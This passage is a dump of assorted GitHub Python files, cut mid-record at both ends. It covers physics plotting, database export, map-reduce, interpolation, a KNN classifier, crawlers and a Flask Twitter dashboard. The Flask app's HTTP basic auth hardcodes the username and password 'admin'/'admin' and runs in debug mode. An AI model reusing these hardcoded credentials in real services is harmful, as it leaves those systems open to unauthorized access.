\";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n profile_attn_pt_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_b\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_pt_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_c\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_pt_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pt_none\", \";#Sigma pT;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, track_pt_bound[0]*2, track_pt_bound[1]*2))\n profile_attn_z0_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_b\", \";#Delta z0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_z0_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_c\", \";#Delta z0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_z0_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_z0_none\", \";#Delta z0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_z0_bound))\n profile_attn_d0_b.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_b\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n profile_attn_d0_c.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_c\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n profile_attn_d0_none.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_d0_none\", \";#Delta d0;Average #alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};\", 20, 0, track_d0_bound))\n\n #read in length of test file\n if os.path.isfile(paramfile_name):\n paramfile = open(paramfile_name, \"r\")\n train_len = int(float(paramfile.readline()))\n val_len = int(float(paramfile.readline()))\n test_len = int(float(paramfile.readline()))\n else:\n print(\"ERROR: Specified parameter file not found\")\n return 1\n batches = int(math.ceil(test_len/batch_size))\n\n for ibatch in range(batches):\n #calculate batch indices\n istart = ibatch*batch_size\n if ibatch == (batches-1) and test_len%batch_size != 0:\n iend = istart + (test_len%batch_size)\n else:\n iend = (ibatch+1)*batch_size\n\n #load batch from file\n batch = dgl.batch(dgl.load_graphs(graphfile_name, list(range(istart, iend)))[0])\n g_list = dgl.unbatch(batch)\n\n for g in g_list:\n features = g.ndata['features_base'].numpy()\n pred = g.edata['pred'].numpy()\n bin_labels = g.edata['bin_labels'].numpy()\n mult_labels = g.edata['mult_labels'].numpy()\n srcnodes, dstnodes = g.edges()\n\n for i in range(pred.shape[0]):\n src_pt = abs(1/features[srcnodes[i],0])\n dst_pt = abs(1/features[dstnodes[i],0])\n src_z0 = features[srcnodes[i],4]\n dst_z0 = features[dstnodes[i],4]\n src_d0 = features[srcnodes[i],3]\n dst_d0 = features[dstnodes[i],3]\n\n c = 0\n for j in range(nattn):\n attn = g.edata['attn'+str(j+1)].numpy()\n for k in range(nheads[j]):\n profile_attn_true[c].Fill(attn[i,k,0], bin_labels[i])\n profile_attn_pred[c].Fill(attn[i,k,0], pred[i,0])\n\n if mult_labels[i] == 1:\n hist_attn_b[c].Fill(attn[i,k,0])\n profile_attn_pt_b[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_b[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_b[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n elif mult_labels[i] == 2:\n hist_attn_c[c].Fill(attn[i,k,0])\n profile_attn_pt_c[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_c[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_c[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n else:\n hist_attn_none[c].Fill(attn[i,k,0])\n profile_attn_pt_none[c].Fill(src_pt+dst_pt, attn[i,k,0])\n profile_attn_z0_none[c].Fill(abs(src_z0-dst_z0), attn[i,k,0])\n profile_attn_d0_none[c].Fill(abs(src_d0-dst_d0), attn[i,k,0])\n c += 1\n\n base_filename = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber\n\n canv1 = TCanvas(\"c1\", \"c1\", 800, 600)\n\n c = 0\n for i in range(nattn):\n for j in range(nheads[i]): \n plot_profile(canv1, [profile_attn_true[c], profile_attn_pred[c]], ['true', 'pred'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_tp.png\")\n plot_hist(canv1, [hist_attn_b[c], hist_attn_c[c], hist_attn_none[c]], ['b', 'c', 'none'], cut_string, True, False, base_filename+\"_attn\"+str(i)+str(j)+\"_bc.png\")\n plot_profile(canv1, [profile_attn_pt_b[c], profile_attn_pt_c[c], profile_attn_pt_none[c]], ['b', 'c', 'none'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_pt.png\")\n plot_profile(canv1, [profile_attn_z0_b[c], profile_attn_z0_c[c], profile_attn_z0_none[c]], ['b', 'c', 'none'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_z0.png\")\n plot_profile(canv1, [profile_attn_d0_b[c], profile_attn_d0_c[c], profile_attn_d0_none[c]], ['b', 'c', 'none'], cut_string, base_filename+\"_attn\"+str(i)+str(j)+\"_d0.png\")\n c += 1\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"jmw464/Vertex-GNN","sub_path":"scripts/visualize_attention.py","file_name":"visualize_attention.py","file_ext":"py","file_size_in_byte":10676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72348557905","text":"import psycopg2 as postgree\nfrom database_connector import DatabaseConnector\nimport os\nimport datetime\nfrom pandas import pandas as pd\n\n# Directory for save the data imported\nLOCAL_TABLES_DIRECTORY: str = os.getcwd() + \"/raw_data\"\nDATE_STRING: str = datetime.date.today().strftime(\"%Y-%m-%d\")\n\n\nclass DataDownload():\n '''Class to download the data'''\n\n @classmethod\n def download_tables(cls) -> str:\n '''Download the tables from database\n\n Args:\n None.\n\n Return:\n str: Tables save in the directory. '''\n\n try:\n QUERY_TABLE: str = \"\"\"SELECT table_name \n FROM information_schema.tables \n WHERE table_schema = 'public'\"\"\"\n\n database_connection = DatabaseConnector.connect()\n cursor = database_connection.cursor()\n\n print(\"Quering database...\")\n\n cursor.execute(QUERY_TABLE)\n\n query_result = cursor.fetchall()\n\n print(f\"Tables found {query_result}\")\n\n for table_data in query_result:\n table = table_data[0]\n select = \"\"\"SELECT * \n FROM {}\"\"\".format(table)\n database_df = pd.read_sql(select, DatabaseConnector.connection)\n database_directory = (\n f\"{LOCAL_TABLES_DIRECTORY}/postgres/{DATE_STRING}\")\n os.makedirs(database_directory, exist_ok=True)\n database_df.to_csv(\n f\"{database_directory}/{table}.csv\", index=False)\n\n print(\"Files save in the directory. \")\n finally:\n DatabaseConnector.close()\n\n return print(\"All the tables downloaded.\")\n\n @classmethod\n def download_csv(cls) -> None:\n '''Download the csv from directory\n\n Args:\n None.\n\n Return:\n None: file save in the directory. '''\n\n path_csv = \"data/order_details.csv\"\n file_name = os.path.basename(path_csv)\n print(\"Exporting csv file.\")\n csv_df = pd.read_csv(\"data/order_details.csv\")\n csv_directory = (\n f\"{LOCAL_TABLES_DIRECTORY}/csv/{DATE_STRING}\")\n os.makedirs(csv_directory, exist_ok=True)\n csv_df.to_csv(f\"{csv_directory}/{file_name}\")\n print(\"File save in the directory.\")\n\n\nif __name__ == \"__main__\":\n step1 = DataDownload()\n step1.download_tables()\n step1.download_csv()\n","repo_name":"cayod/pipeline-airflow-docker","sub_path":"airflow/dags/step1/data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15177645590","text":"from functools import reduce\nfrom multiprocessing import Pool\n\n# mapper function\ndef count_words(names):\n count_names = {}\n for name in names:\n if not name in count_names:\n count_names[name] = 0\n count_names[name] += 1\n #print(count_names)\n return count_names \n\n# reduce function\n# dict1: es el resultado previo que se va acumulando\n# dict2: es el nuevo diccionario\ndef calculate(dict1, dict2):\n combined = {}\n\n #print(dict1, dict2)\n\n for key in dict1:\n combined[key] = dict1[key]\n\n for key in dict2:\n if key in combined:\n combined[key] += dict2[key]\n else:\n combined[key] = dict2[key]\n\n return combined\n\n\nif __name__ == \"__main__\":\n list_of_names = [[\"Maria\", \"Pedro\", \"Juan\"], [\"Pedro\"], [\"Maria\"]]\n\n with Pool() as pool:\n results = pool.map(count_words, list_of_names) # MAP\n\n words = reduce(calculate, results)\n\n for key, val in words.items():\n print(\"El total para {} es {}\".format(key, val))\n\n# python3 -m pip install multiprocess\n# sample source: https://chryswoods.com/parallel_python/mapreduce2_answer2.html","repo_name":"balbuenac/batch-map-reduce","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33655947002","text":"\nimport sqlite3\nfrom sqlite3 import Error\nimport logging\nimport datetime\nfrom contextlib import contextmanager\n\n\ntable_def_file = '''CREATE TABLE IF NOT EXISTS data (\n id INTEGER PRIMARY KEY,\n name text NOT NULL,\n start_time DATETIME NOT NULL,\n duration REAL NOT NULL,\n comments text\n);'''\n\n\nwrite_def = '''INSERT INTO data(name,start_time,duration, comments)\n VALUES(?,?,?,?);'''\n\nread_data = '''SELECT\n * FROM data\n ORDER BY start_time DESC\n LIMIT ? OFFSET ?;'''\n\n\n@contextmanager\ndef LogFile(file_path):\n try:\n conn = sqlite3.connect(file_path)\n _create_table(conn, table_def_file)\n print(sqlite3.version)\n yield conn\n except Error as e:\n logging.critical(e)\n finally:\n conn.close()\n\n\ndef _create_table(conn, create_table_sql):\n \"\"\" create a table from the create_table_sql statement\n :param conn: Connection object\n :param create_table_sql: a CREATE TABLE statement\n :return:\n \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n logging.critical(e)\n\n\ndef write(conn, data):\n cur = conn.cursor()\n cur.execute(write_def, data)\n conn.commit()\n return cur.lastrowid\n\n\ndef read(conn, cond):\n cur = conn.cursor()\n cur.execute(read_data, cond)\n x = cur.fetchall()\n return x\n\n\nif __name__ == '__main__':\n with LogFile(\"pythonsqlite.db\") as f:\n x = (datetime.datetime.now(),)\n # data1 = (\"Station1\", datetime.datetime.now(), 56, \"aaa\")\n # data2 = (\"Station2\", datetime.datetime.now(), 56, \"aaa\")\n # write(f, data1)\n # write(f, data2)\n d = read(f, (2,3))\n print(d)\n","repo_name":"zencrust/part-monitor-report","sub_path":"AlarmLogger/sqlliteTest.py","file_name":"sqlliteTest.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19940470826","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.instagram.com/'\nlinks = ['kimelya_11']\n\nresult = requests.get(url + links[0])\nsoup = BeautifulSoup(result.text)\n\nscripts = soup.findAll('script', {'type': 'text/javascript'})\n\nprint(scripts[3])\n\nwith open(links[0] + \".html\", \"w\", encoding=\"utf-8\") as f:\n f.write(result.text)\n","repo_name":"Creariax5/Wiki-Scrap","sub_path":"insta/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74309269266","text":"from PIL import Image, ImageDraw\nimport PIL\nfrom tkinter import *\nimport numpy\n\n# Nouvelle fenêtre permettant de dessiner un nombre à la souris\n# NE FONCTIONNE PAS\nclass DrawNumberWindow:\n\n def __init__(self, interface):\n self.width = 224\n self.height = 224\n self.interface = interface\n self.second_window = Tk()\n self.cv = Canvas(self.second_window, width=self.width, height=self.height, bg='white')\n self.cv.grid(row=0, column=0)\n\n self.image1 = PIL.Image.new(\"L\", (self.width, self.height))\n self.draw = ImageDraw.Draw(self.image1)\n self.cv.bind(\"\", self.paint)\n\n button = Button(self.second_window, text=\"Guess\", command=self.guess)\n button.grid(row=1, column=0)\n self.second_window.mainloop()\n\n # renvoie un vecteur de 784 valeurs correspondant au dessin recadré de l'utilisateur.\n def guess(self):\n image = self.image1.resize((28, 28))\n array = numpy.array(image.getdata(),\n numpy.uint8).reshape(image.size[1], image.size[0], 1)\n self.interface.drawing_values = array\n self.interface.guess_drawing()\n self.second_window.destroy()\n\n def paint(self, event):\n x1, y1 = (event.x - 1), (event.y - 1)\n x2, y2 = (event.x + 1), (event.y + 1)\n self.cv.create_oval(x1, y1, x2, y2, fill=\"black\", width=3)\n self.draw.line([x1, y1, x2, y2], fill=\"black\", width=3)\n","repo_name":"Civel-1/HandwrittenNumbers","sub_path":"DrawNumberWindow.py","file_name":"DrawNumberWindow.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35372010842","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\n\nimport lagrange_polynomial\nimport error_compare\nimport functions\n\nprint(\"Enter n: \")\nn = int(input())\n#n = 60\ns = 0.0\ne = 10.0\n\n\nx_test = np.linspace(s, e, 1000)\ny_test = functions.f(x_test)\n\nx_node = np.linspace(s, e, n)\ny_node = functions.f(x_node)\n\nx_cheb_node = lagrange_polynomial.create_cheb_nodes(s, e, n)\ny_cheb_node = functions.f(x_cheb_node)\n\nx_res = lagrange_polynomial.create_test_x(s, e, n)\ny_res = np.zeros(n - 1)\ny_cheb_res = np.zeros(n - 1)\n\nfor k in range(0, n - 1, 1):\n y_res[k] = lagrange_polynomial.calc(x_res[k], x_node, y_node, n)\n y_cheb_res[k] = lagrange_polynomial.calc(x_res[k], x_cheb_node, y_cheb_node, n)\n\n\n#print(\"x_res: \", x_res)\n#print(\"y_res: \", y_res)\n#print(\"y_cheb_res: \", y_cheb_res)\n#print(\"\\n\")\n_error = functions.error(x_res, y_res)\ncheb_error = functions.error(x_res, y_cheb_res)\n#print(\"max_error: \", _error)\n#print(\"max_cheb_error: \", cheb_error)\nplt.plot(x_test, y_test, c='green', label='function')\n#plt.scatter(x_node, y_node, c='blue', s=50, label='nodes')\n#plt.scatter(x_cheb_node, y_cheb_node, c='orange', s=50, label='cheb_nodes')\nplt.scatter(x_res, y_res, c='red', s=10, label='calc_points')\nplt.scatter(x_res, y_cheb_res, c='purple', s=10, label='calc_cheb_points')\nplt.annotate(\"n: %d\" % n, xy=(0.6, 0.15), xycoords='axes fraction')\nplt.annotate(\"max_error: %.5f\" % _error, xy=(0.6, 0.1), xycoords='axes fraction')\nplt.annotate(\"max_cheb_error: %.5f\" % cheb_error, xy=(0.6, 0.05), xycoords='axes fraction')\nplt.legend()\nplt.show()\n\n# _from = 10\n# _to = 200\n# _step = 10\n# errors, cheb_errors = error_compare.calc_errors(s, e, _from, _to, _step)\n# x_i = np.linspace(_from, _to, int((_to - _from) / _step) + 1)\n# plt.plot(x_i, errors, label='error')\n# plt.plot(x_i, cheb_errors, label='cheb_error')\n# plt.legend()\n# #plt.show()\n# # print(\"errors: \", errors)\n# # print(\"cheb_errors: \", cheb_errors)\n# with open('errors.csv', mode='w', newline='') as error_file:\n# file_writer = csv.writer(error_file, delimiter=',')\n# file_writer.writerow(['n', 'error', 'cheb_error'])\n# for i in range(_from, _to+1, _step):\n# file_writer.writerow([i, errors[int((i - _from) / _step)], cheb_errors[int((i - _from) / _step)]])\n","repo_name":"razenkovv/Num_methods_5sem","sub_path":"LR1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7474440622","text":"from typing import List\nimport couchdb\nimport parse_yaml\nimport sys\n\nsys.path.append('../../../config')\nimport config\n\nworkflow = []\ndb = couchdb.Server(config.COUCHDB_URL)\ntimedict = {}\nmxdis = 0\nans = []\n\ndef pre(request_id):\n global timedict, mxdis, ans\n timedict = {}\n mxdis = 0\n ans = []\n for _id in db['workflow_latency']:\n doc = db['workflow_latency'][_id]\n if doc['request_id'] != request_id or doc['phase'] != 'all':\n continue\n timedict[doc['function_name']] = doc['time']\n\ndef dfs(name, dis, path: List):\n global mxdis, ans\n path.append(name)\n tmpdis = dis\n if name in timedict:\n tmpdis = dis + timedict[name]\n if tmpdis > mxdis:\n mxdis = tmpdis\n ans = list(path)\n for name in workflow.nodes[name].prev:\n dfs(name, tmpdis, path)\n path.pop()\n\ndef analyze(workflow_name, request_id):\n global workflow, timedict\n workflow = parse_yaml.parse(workflow_name)\n pre(request_id)\n for name, _ in workflow.nodes.items():\n if name in timedict:\n dfs(name, 0, [])\n return ans\n","repo_name":"sjtu-epcc/FaaSFlow","sub_path":"test/asplos/schedule_overhead/find_critical_path.py","file_name":"find_critical_path.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"17094622987","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport json\nimport time\nimport socket\nimport logging\nfrom bson import json_util\nfrom modules.datebase import MongoDB\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask import Flask, jsonify, make_response, render_template, url_for\nfrom prometheus_flask_exporter.multiprocess import GunicornPrometheusMetrics\n\n#config log\nfile_log = os.path.basename(__file__).replace('.py', '.log')\nfmt=(\"{'time':'%(asctime)s','name':'%(name)s','level':'%(levelname)s','message':'%(message)s'}\")\nformatter = logging.Formatter(fmt)\nstream_handler = logging.StreamHandler(sys.stdout)\nstream_handler.setFormatter(formatter)\n\n#log main\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(stream_handler)\n\n#log flask_werkzeug\nlog_flask = logging.getLogger('werkzeug')\nlog_flask.addHandler(stream_handler)\n\n#log mongodb\nlog_mongodb = logging.getLogger(\"mongodb\")\nlog_mongodb.setLevel(logging.INFO)\nlog_mongodb.addHandler(stream_handler)\n\n#log path\ntry:\n path_log = os.environ[\"LOG_PATH\"]\nexcept KeyError:\n log.error(\"environment variable to config log not found!\")\n sys.exit(1)\nif os.environ[\"LOG_FILE\"] == \"true\":\n file_handler = logging.FileHandler(\"{}/{}\".format(path_log, file_log))\n file_handler.setFormatter(formatter)\n log.addHandler(file_handler)\n log_flask.addHandler(file_handler)\n log_mongodb.addHandler(file_handler)\n\n#obj mondodb\ndb = MongoDB()\n\n#instance flask app\napp = Flask(__name__)\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n\n#instance auth\nauth = HTTPBasicAuth()\n\n#metrics by prometheus\nmetrics = GunicornPrometheusMetrics(app)\n\n@auth.get_password\ndef get_password(username):\n if username == 'admin':\n return 'admin'\n return None\n\n@app.route('/')\ndef follow():\n return render_template('follow.html', \n title='Tweets by Followers', \n follow=db.mongo_find_sort())\n\n@app.route('/hour')\ndef hour():\n return render_template('hour.html', \n title='Tweets by Time', \n hour=db.mongo_total_post_by_hour())\n\n@app.route('/location')\ndef location():\n return render_template('location.html', \n title='Tweets by Location', \n location=db.mongo_total_tag_by_location())\n\n@app.route('/health')\ndef probe():\n try:\n host = os.environ[\"MONGODB_HOST\"]\n port = int(os.environ[\"MONGODB_PORT\"])\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n try :\n s.connect((host, port))\n return jsonify({'database': 'up'}), 200\n except :\n return jsonify({'database': 'down'}), 500\n except KeyError:\n log.error(\"environment variable to access mongodb not found!\")\n sys.exit(1)\n except Exception as e:\n log.error(e)\n\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify( { 'error': 'Unauthorized access' } ), 403)\n\n@app.errorhandler(400)\ndef bad_request(error):\n return make_response(jsonify( { 'error': 'Bad Request' } ), 400)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Not Found' } ), 404)\n\n@app.errorhandler(500)\ndef server_error(error):\n return make_response(jsonify( { 'error': 'Internal Server' } ), 500)\n\n@app.route('/api/v1/tweets', methods = ['GET'])\n@auth.login_required\ndef get_tweets():\n try:\n t = list()\n tweets = db.mongo_find_all()\n for tweet in tweets:\n t.append(tweet)\n return jsonify(json.loads(json_util.dumps(t)))\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/followers', methods = ['GET'])\n@auth.login_required\ndef get_followers():\n try:\n follow = db.mongo_find_sort()\n return jsonify(json.loads(json_util.dumps(follow)))\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/posts', methods = ['GET'])\n@auth.login_required\ndef get_posts():\n try:\n posts = db.mongo_total_post_by_hour()\n return jsonify(posts)\n except Exception as e:\n log.error(e)\n\n@app.route('/api/v1/tweets/location', methods = ['GET'])\n@auth.login_required\ndef get_location():\n try:\n location = db.mongo_total_tag_by_location()\n return jsonify(location)\n except Exception as e:\n log.error(e)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)","repo_name":"ogithubdotiago/twitter-app","sub_path":"frontend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10696727065","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import *\nfrom .tasks import *\n\ndef update_subscription(modeladmin, request, queryset):\n for sub in queryset:\n sub.check_subscription_payments()\n return\n\n\nclass SubscriptionPaymentInline(admin.TabularInline):\n model = SubscriptionPayment\n fields = ('source_character', 'is_trial_payment','amount', 'journal_id', 'payment_time_actual', 'payment_read_time')\n #readonly_fields = ('source_character', 'journal_id', 'payment_time_actual', 'payment_read_time')\n readonly_fields = ['payment_read_time', 'payment_time_actual', 'journal_id']\n extra = 0\n\n #can_delete = False\n\n\nclass SubscriptionStatusAdmin(admin.ModelAdmin):\n model= SubscriptionStatus\n #filter_horizontal = ('item_groups',)\n list_display = ('__str__', 'active','credit_remaining','credit_consumed', 'subscription_last_updated', 'id' )\n search_fields = ['__str__']\n readonly_fields = ('user','credit_remaining','credit_consumed', 'subscription_last_updated', 'id' )\n inlines = [SubscriptionPaymentInline]\n actions = [update_subscription]\n\nadmin.site.register(SubscriptionStatus, SubscriptionStatusAdmin)\n\n","repo_name":"zanielyene/krabacus3","sub_path":"app/payments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30256228015","text":"import numpy as np\n\nclass KNN:\n def __init__(self, k):\n self.k = k\n def norm(self, X, fit):\n if fit:\n self.Xmean, self.Xstd = X.mean(), X.std() + 0.001\n \n return (X - self.Xmean )/self.Xstd\n def fit(self, X, y):\n self.X = self.norm(X, fit=True)\n self.y = y\n\n def vote(self, neighbors):\n y = self.y[neighbors]\n return np.argmax(np.bincount(y))\n\n \n def predict(self, Xtest):\n Xtest = self.norm(Xtest, fit=False)\n preds = []\n for obs in Xtest:\n dist = np.sum((self.X - obs)**2, axis=1)\n kneighbors =np.argsort(dist)[:self.k]\n preds.append(self.vote(kneighbors))\n return preds\n \n \nimport pandas as pd\n\nk = KNN(5)\ndf= pd.read_csv('/Users/shravanshetty/Documents/GitHub/ml_algo_scratch/notebook/python/data/student_result_data.txt', header = None)\ndf.head()\n\nk.fit(df.loc[:, [0,1]].values, df[2].values)\n\ndf['predict'] = k.predict(df.loc[:, [0,1]].values)\nprint(df)\nprint((df[2] == df['predict']).sum()/df.shape[0])\n\n","repo_name":"shett044/ml_algo_scratch","sub_path":"notebook/python/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7931845391","text":"total_ced = 0\r\nced = 50\r\n\r\nprint('''-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n BANCO CEV \r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')\r\n\r\nvalor = int(input('Que valor você quer sacar? R$'))\r\ntotal = valor\r\nt_ced = 0\r\n\r\nwhile True:\r\n if total >= ced:\r\n total -= ced\r\n t_ced += 1\r\n else:\r\n if t_ced > 0:\r\n print(f'Total de {t_ced} de R${ced}.')\r\n if ced == 50:\r\n ced = 20\r\n elif ced == 20:\r\n ced = 10\r\n elif ced == 10:\r\n ced = 1\r\n t_ced = 0\r\n if total == 0:\r\n break\r\n\r\nprint(''' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\nVolte sempre no BANCO DEV! Tenha um bom dia!\r\n -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')\r\n\r\n\r\n############ Sem while ############\r\n\r\n\r\n\"\"\"\r\ncinquenta = vinte = dez = um = 0\r\n\r\nvalor = int(input('Que valor você quer sacar? R$'))\r\n\r\nif valor >= 50:\r\n cinquenta = valor // 50\r\n valor %= 50\r\n print(f'Total de {cinquenta} cédulas de R$50')\r\nif valor >= 20:\r\n vinte = valor // 20\r\n valor %= 20\r\n print(f'Total de {vinte} cédulas de R$20')\r\nif valor >= 10:\r\n dez = valor // 10\r\n valor %= 10\r\n print(f'Total de {dez} cédulas de R$10')\r\nif valor >= 1:\r\n um = valor // 1\r\n valor %= 1\r\n print(f'Total de {um} cédulas de R$1')\r\n\r\n\"\"\"","repo_name":"BrenoTNK/cev-python","sub_path":"aula15 - interrompendowhile/desafio071.py","file_name":"desafio071.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7744043042","text":"# This files contains the Celery crawl_task that will run asynchronously.\n\nfrom celery import Celery\nimport mysql.connector\nimport sql_helper\nimport sys\nimport json\nimport os\nfrom datetime import datetime\nimport time\nimport crawl_OAG\nimport crawl_arxiv\nimport crawl_springer\n# import crawl_gscholar\nimport pandas as pd\n\n# Redis broker URL\nBROKER_URL = 'redis://localhost:6380/0'\n\n# We are creating an instance of Celery class by passing module name as Publication Crawler and broker as Redis.\ncelery_app = Celery('Publication_Crawler', backend='rpc://', broker=BROKER_URL)\n\n# Functions which are decorated with @celery_app.task considered celery tasks.\n@celery_app.task\ndef crawl_task(crawler, professor, university):\n print(\"Started scraping \" + crawler + \": \" + professor + \", \" + university)\n res = None\n\n # Call each crawler\n if crawler == \"crawl_arxiv\":\n res = crawl_arxiv.crawl(professor, university)\n \n elif crawler == \"crawl_oag\":\n res = crawl_OAG.crawl(professor, university)\n\n elif crawler == \"crawl_springer\":\n res = crawl_springer.crawl(professor, university)\n\n elif crawler == \"crawl_gscholar\":\n \"\"\"\"\n res = crawl_gscholar.crawl(professor, university)\n \"\"\"\n \n if res is not None:\n sql_helper.mysql_connect()\n res[\"citations\"] = res[\"citations\"].fillna(0)\n res[\"citations\"] = res[\"citations\"].astype(int)\n\n # Iterate through res dataframe and insert data into output_publications database table.\n for index, row in res.iterrows():\n timestamp = datetime.now()\n citations = row[\"citations\"]\n if citations == \"\" or citations is None:\n citations = 0\n\n else:\n citations = int(citations)\n\n sql = \"INSERT IGNORE INTO output_publications (timestamp, title, authors, abstract, doi, citations, knowledge_base) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\n val = (timestamp, row[\"title\"], row[\"authors\"], row[\"abstract\"], row[\"doi\"], citations, crawler.split(\"crawl_\")[1])\n sql_helper.connection.cursor().execute(sql, val)\n\n # Connection is not autocommit by default. So you must commit to save your changes.\n sql_helper.connection.commit()\n\n print(\"Done scraping \" + crawler + \": \" + professor + \", \" + university)","repo_name":"Forward-UIUC-2021F/bhavesh-manivannan-publication-consolidator","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16119772440","text":"__author__ = 'changye'\n\nimport json\nimport re\nimport requests\nfrom datetime import datetime, timedelta\nimport tools\nimport logging\n# logging.basicConfig(level=logging.WARNING)\n\ndef getFromUrl(url):\n header = {\n 'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\",\n 'Referer': \"http://www.sse.com.cn/assortment/fund/fjlof/netvalue/\",\n 'Connection': \"keep-alive\",\n 'Accept': \"*/*\",\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8'\n }\n url = url + '&_=' + '%d' %int(datetime.now().timestamp() * 1000)\n logging.info(url)\n r = requests.get(url, headers=header, allow_redirects=False)\n logging.info(r.status_code)\n if(r.status_code == 200):\n return r.text\n else:\n return None\n\ndef getJson(text):\n m = re.match(r'mycallback\\(({.*})\\)', text)\n if(m):\n logging.info(m.group(1))\n return json.loads(m.group(1))['result']\n\n\ndef queryFund(*date, query='value'):\n if len(date) < 1:\n queryDate = tools.lastValidMarketDay().strftime('%Y%m%d')\n logging.info('Default date is:\\t' + queryDate)\n else:\n queryDate = datetime.strptime(date[0], '%Y-%m-%d').strftime('%Y%m%d')\n\n if query == 'value':\n 